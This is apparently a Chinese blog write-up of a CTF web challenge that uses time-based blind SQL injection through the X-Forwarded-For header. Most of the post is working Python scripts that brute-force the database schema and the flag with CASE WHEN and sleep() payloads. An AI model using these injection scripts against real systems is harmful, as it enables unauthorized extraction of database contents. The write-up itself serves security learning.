实验吧 who are you? By Assassin 时间盲注

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_35078631/article/details/54773769

说真的这是我第一次接触时间盲注,而且这还是简单的时间盲注…不过感觉题目还是有一定难度的。

首先我们看到原始网页显示your ip is :xxx.xxx.xxx.xxx。然后可以联想是http头注入,当然了我之前只会X-FORWARDED-FOR,查看资料貌似还可以用:

Client-IP
x-remote-IP
x-originating-IP
x-remote-addr

但是这里当然是还是用X-FORWARDED-FOR了,嗯!

用burp试验一下
这里写图片描述

然后发现无论怎么搞都是原封不动的返回回来,瞬间蒙蔽…报错注入估计是指望不上了…

这里写图片描述

而且发现一个有趣的现象,逗号被隔断了

这里写图片描述

这种情况应该是只需要查找一项就行了吧,猜测是把字符串截断一下人后去查询吧,但是我还是不会…

么办法查一下大牛有没有什么思路吧…

原来是时间盲注!

然后想到了用暴力法去找到他得库名,表明,字段名和内容!具体就死超时判断法,用到了select case when then具体的可以上网查一下,具体实现的方法就是暴力匹配每一个字符,如何匹配了让他sleep一段时间,在get请求的时候设置一个超时去判断是否匹配成功直接看代码吧~

暴力求数据库名

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]

for database_number in range(0,100):        #假设爆破前100个库
    databasename=''
    for i in range(1,100):                  #爆破字符串长度,假设不超过100长度
        flag=0
        for str in guess:                   #爆破该位置的字符
            #print 'trying ',str
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                databasename+=str
                flag=1
                print '正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename
                break
        if flag==0:
            break
    database.append(databasename)
    if i==1 and flag==0:
        print '扫描完成'
        break

for i in range(len(database)):
    print database[i]

这里写图片描述

这里用到了information_schema中schemata这表,嗯

暴力求表名
这里面需要提前知道,有information_sechma和web4,第一个在我的电脑上是有59列,但是也不知道他有几个…所以写个小脚本跑一下

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]

for table_number in range(0,500):   
    print 'trying',table_number
    headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
    try:
        res=requests.get(url,headers=headers,timeout=4)
    except:
        print table_number
        break

可以得到有42个列…有点多啊…不过呢我们一般猜测都在最后把,前面的应该都是什么information_schema里的那个。尝试一下:

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
tables=[]

for table_number in range(41,42):           #假设从第60个开始
    tablename=''
    for i in range(1,100):                  #爆破字符串长度,假设不超过100长度
        flag=0
        for str in guess:                   #爆破该位置的字符
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                tablename+=str
                flag=1
                print '正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename
                break
        if flag==0:
            break
    tables.append(tablename)
    if i==1 and flag==0:
        print '扫描完成'
        break

for i in range(len(tables)):
    print tables[i]

这里写图片描述
我说什么来着,就是他了。

暴力求列名
其实直接猜是不是flag啊…不过还是可以暴力,因为是上面列的最后一个嘛,所以关键字段肯定也是最后一个吧,老思路,看有几个列,然后暴力最后一个

看有几个列

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]

for table_number in range(0,1000):  
    print 'trying',table_number
    headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
    try:
        res=requests.get(url,headers=headers,timeout=4)
    except:
        print table_number
        break

有483列

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
columns=[]

for column_number in range(482,483):            #假设从第60个开始
    cloumnname=''
    for i in range(1,100):                  #爆破字符串长度,假设不超过100长度
        flag=0
        for str in guess:                   #爆破该位置的字符
            #print 'trying',str
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                cloumnname+=str
                flag=1
                print '正在扫描第%d个列名,the cloumnname now is '%(column_number+1) ,cloumnname
                break
        if flag==0:
            break
    columns.append(cloumnname)
    if i==1 and flag==0:
        print '扫描完成'
        break

for i in range(len(columns)):
    print columns[i]

这里写图片描述

然后暴力就行了!

#-*-coding:utf-8-*-
import requests
import string
url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess=string.lowercase + string.uppercase + string.digits
flag=""

for i in range(1,100):
    havetry=0
    for str in guess:
        headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}
        try: 
            res=requests.get(url,headers=headers,timeout=6)
        except requests.exceptions.ReadTimeout, e:
            havetry=1
            flag = flag + str
            print "flag:", flag
            break
    if havetry==0:
        break
print 'result:' + flag

真是好题~

没有更多推荐了,返回首页